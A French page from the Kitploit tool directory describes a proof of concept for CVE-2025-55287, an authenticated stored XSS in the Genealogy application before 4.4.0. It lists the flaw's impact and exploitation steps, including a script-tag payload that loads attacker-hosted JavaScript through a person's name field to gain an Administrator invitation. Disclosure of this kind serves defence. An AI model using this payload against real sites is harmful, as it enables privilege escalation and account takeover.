Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55287-POC — PoC d'élévation de privilèges par XSS stocké authentifié. Affecte les versions de Genealogy antérieures à 4.4.0. | Kitploit
Outils/GitHubGitHub/eternalvalhalla/cve-2025-55287-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubeternalvalhalla/cve-2025-55287-poc

CVE-2025-55287-POC

PoC d'élévation de privilèges par XSS stocké authentifié. Affecte les versions de Genealogy antérieures à 4.4.0.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 0 ansPas encore vérifié

CVE-2025-55287-POC

Le Cross-Site Scripting stocké authentifié (XSS) dans les versions antérieures à 4.4.0 de l'application de généalogie permet l'exécution arbitraire de JavaScript et l'élévation de privilèges du rôle Editor+ à Administrator.

Résumé
  • Type de vulnérabilité : Cross-Site Scripting stocké (CWE-79)
  • Composant affecté : 'Person' firstname et lastname.
  • Versions affectées : toutes les versions antérieures à 4.4.0
  • Impact : exécution persistante de JavaScript fourni par l'attaquant dans les navigateurs des victimes ; détournement de session, CSRF via le DOM, redressement d'interface, vol d'identifiants ou actions arbitraires en tant que la victime.
  • Vecteur d'attaque : authentifié (tout rôle pouvant créer une nouvelle personne – editor+)
Exploitation

Cause racine : assainissement/encodage insuffisant côté serveur du firstname/lastname de la personne après la suppression réussie de la personne affectée par un utilisateur plus privilégié.

PoC :

  1. Authentifiez-vous à l'application (rôle editor+).
  2. Créez une nouvelle personne (elle ne doit pas nécessairement être rattachée à une famille).
  3. Incluez le JavaScript comme prénom ou nom de la personne ajoutée : <script src='yourserver/poc.js'></script>
  4. Modifiez poc.js en insérant votre adresse e-mail dans le placeholder.
  5. Lorsqu'un utilisateur privilégié tente de supprimer la personne nouvellement ajoutée, vous recevrez une invitation à la plateforme sur l'adresse e-mail fournie avec le rôle Administrator.
Télécharger l’outil